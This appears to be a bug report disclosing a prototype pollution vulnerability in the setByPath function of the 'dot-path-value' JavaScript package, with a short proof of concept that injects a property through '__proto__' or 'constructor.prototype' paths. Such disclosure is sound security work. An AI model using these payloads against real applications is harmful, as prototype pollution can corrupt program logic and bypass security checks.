Prototype Pollution of setByPath #18
Description
I have found a prototype pollution vulnerability, below is the PoC:
var path = require('dot-path-value');
assert(({}).polluted === undefined);
path.setByPath({}, '__proto__.polluted', 'yes');
// or path.setByPath({}, 'constructor.prototype.polluted', 'yes')
assert(({}).polluted === 'yes');
Please kindly review.